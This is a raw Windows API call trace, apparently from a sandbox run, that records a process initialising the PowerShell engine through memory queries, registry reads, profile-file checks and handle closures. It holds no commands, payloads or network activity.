	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.685] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.686] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0151.689] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0151.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0151.689] CoTaskMemFree (pv=0x1b7dacf0) 
	[0151.693] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0151.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0151.693] CoTaskMemFree (pv=0x1b7dacf0) 
	[0151.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.864] VirtualQuery (in: lpAddress=0x1cb820, lpBuffer=0x1cc6e0, dwLength=0x30 | out: lpBuffer=0x1cc6e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0152.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.051] VirtualQuery (in: lpAddress=0x1cb820, lpBuffer=0x1cc6e0, dwLength=0x30 | out: lpBuffer=0x1cc6e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0152.051] VirtualQuery (in: lpAddress=0x1cb070, lpBuffer=0x1cbf30, dwLength=0x30 | out: lpBuffer=0x1cbf30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0152.051] VirtualQuery (in: lpAddress=0x1cb070, lpBuffer=0x1cbf30, dwLength=0x30 | out: lpBuffer=0x1cbf30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0152.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd678 | out: phkResult=0x1cd678*=0x388) returned 0x0
	[0152.052] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5fc, lpData=0x0, lpcbData=0x1cd5f8*=0x0 | out: lpType=0x1cd5fc*=0x1, lpData=0x0, lpcbData=0x1cd5f8*=0x56) returned 0x0
	[0152.052] CoTaskMemAlloc (cb=0x5a) returned 0x1b814a30
	[0152.052] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5cc, lpData=0x1b814a30, lpcbData=0x1cd5c8*=0x56 | out: lpType=0x1cd5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd5c8*=0x56) returned 0x0
	[0152.053] CoTaskMemFree (pv=0x1b814a30) 
	[0152.053] RegCloseKey (hKey=0x388) returned 0x0
	[0152.053] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd678 | out: phkResult=0x1cd678*=0x388) returned 0x0
	[0152.053] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5fc, lpData=0x0, lpcbData=0x1cd5f8*=0x0 | out: lpType=0x1cd5fc*=0x1, lpData=0x0, lpcbData=0x1cd5f8*=0x56) returned 0x0
	[0152.053] CoTaskMemAlloc (cb=0x5a) returned 0x1b814a30
	[0152.053] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5cc, lpData=0x1b814a30, lpcbData=0x1cd5c8*=0x56 | out: lpType=0x1cd5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd5c8*=0x56) returned 0x0
	[0152.053] CoTaskMemFree (pv=0x1b814a30) 
	[0152.053] RegCloseKey (hKey=0x388) returned 0x0
	[0152.057] CoTaskMemAlloc (cb=0x20c) returned 0x3399b0
	[0152.058] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3399b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0152.059] CoTaskMemFree (pv=0x3399b0) 
	[0152.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0152.059] CoTaskMemAlloc (cb=0x20c) returned 0x3399b0
	[0152.059] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3399b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0152.059] CoTaskMemFree (pv=0x3399b0) 
	[0152.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0152.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0152.062] SetErrorMode (uMode=0x1) returned 0x1
	[0152.063] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd5e0 | out: lpFileInformation=0x1cd5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0152.063] SetErrorMode (uMode=0x1) returned 0x1
	[0152.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0152.063] SetErrorMode (uMode=0x1) returned 0x1
	[0152.063] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd5e0 | out: lpFileInformation=0x1cd5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0152.063] SetErrorMode (uMode=0x1) returned 0x1
	[0152.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0152.063] SetErrorMode (uMode=0x1) returned 0x1
	[0152.063] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd5e0 | out: lpFileInformation=0x1cd5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0152.063] SetErrorMode (uMode=0x1) returned 0x1
	[0152.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0152.064] SetErrorMode (uMode=0x1) returned 0x1
	[0152.064] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd5e0 | out: lpFileInformation=0x1cd5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0152.064] SetErrorMode (uMode=0x1) returned 0x1
	[0152.066] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.067] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.068] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.068] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.071] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.071] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.074] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.074] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.079] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.079] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0152.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x31c
	[0152.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x34c
	[0152.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0152.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c
	[0152.084] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.084] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.212] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0152.212] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cd7c0 | out: lpMode=0x1cd7c0) returned 1
	[0152.213] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.213] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.216] SetEvent (hEvent=0x390) returned 1
	[0152.216] SetEvent (hEvent=0x39c) returned 1
	[0152.216] SetEvent (hEvent=0x38c) returned 1
	[0152.216] SetEvent (hEvent=0x350) returned 1
	[0152.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360
	[0152.219] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.219] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.219] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd518 | out: phkResult=0x1cd518*=0x398) returned 0x0
	[0152.219] RegQueryValueExW (in: hKey=0x398, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cd49c, lpData=0x0, lpcbData=0x1cd498*=0x0 | out: lpType=0x1cd49c*=0x0, lpData=0x0, lpcbData=0x1cd498*=0x0) returned 0x2

Thread:
	id = 148
	os_tid = 0xa88


Thread:
	id = 153
	os_tid = 0xb1c


Thread:
	id = 157
	os_tid = 0x614


Thread:
	id = 162
	os_tid = 0xb9c


Thread:
	id = 163
	os_tid = 0xb74

	[0127.885] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0143.256] RegCloseKey (hKey=0x31c) returned 0x0
	[0143.256] LocalFree (hMem=0x3482e0) returned 0x0
	[0143.257] RegCloseKey (hKey=0x344) returned 0x0
	[0143.257] LocalFree (hMem=0x348310) returned 0x0
	[0143.257] CloseHandle (hObject=0x33c) returned 1
	[0143.257] CloseHandle (hObject=0x13) returned 1
	[0143.258] CloseHandle (hObject=0xf) returned 1
	[0143.258] RegCloseKey (hKey=0x324) returned 0x0
	[0143.258] RegCloseKey (hKey=0x320) returned 0x0
	[0145.135] RegCloseKey (hKey=0x320) returned 0x0
	[0148.268] RegCloseKey (hKey=0x384) returned 0x0
	[0148.269] RegCloseKey (hKey=0x380) returned 0x0
	[0148.269] RegCloseKey (hKey=0x37c) returned 0x0
	[0148.269] RegCloseKey (hKey=0x378) returned 0x0
	[0148.270] RegCloseKey (hKey=0x374) returned 0x0
	[0148.270] RegCloseKey (hKey=0x370) returned 0x0
	[0148.270] RegCloseKey (hKey=0x398) returned 0x0
	[0148.271] RegCloseKey (hKey=0x360) returned 0x0
	[0148.271] RegCloseKey (hKey=0x35c) returned 0x0
	[0148.271] RegCloseKey (hKey=0x358) returned 0x0
	[0148.272] RegCloseKey (hKey=0x354) returned 0x0
	[0148.272] RegCloseKey (hKey=0x350) returned 0x0
	[0148.273] RegCloseKey (hKey=0x34c) returned 0x0
	[0148.273] RegCloseKey (hKey=0x31c) returned 0x0
	[0148.273] RegCloseKey (hKey=0x344) returned 0x0
	[0148.273] RegCloseKey (hKey=0x394) returned 0x0
	[0148.274] RegCloseKey (hKey=0x324) returned 0x0
	[0148.274] RegCloseKey (hKey=0x320) returned 0x0
	[0148.274] RegCloseKey (hKey=0x36c) returned 0x0
	[0148.275] RegCloseKey (hKey=0x39c) returned 0x0
	[0148.275] RegCloseKey (hKey=0x38c) returned 0x0
	[0148.275] RegCloseKey (hKey=0x388) returned 0x0
	[0151.346] RegCloseKey (hKey=0x34c) returned 0x0
	[0151.346] RegCloseKey (hKey=0x31c) returned 0x0
	[0151.346] RegCloseKey (hKey=0x344) returned 0x0
	[0151.347] RegCloseKey (hKey=0x394) returned 0x0
	[0151.347] RegCloseKey (hKey=0x324) returned 0x0
	[0151.347] RegCloseKey (hKey=0x320) returned 0x0
	[0151.347] RegCloseKey (hKey=0x390) returned 0x0
	[0151.347] RegCloseKey (hKey=0x350) returned 0x0
	[0151.348] RegCloseKey (hKey=0x39c) returned 0x0
	[0151.348] RegCloseKey (hKey=0x38c) returned 0x0
	[0151.348] RegCloseKey (hKey=0x388) returned 0x0
	[0153.615] RegCloseKey (hKey=0x398) returned 0x0
	[0155.568] CloseHandle (hObject=0x3d4) returned 1
	[0155.569] CloseHandle (hObject=0x3b8) returned 1
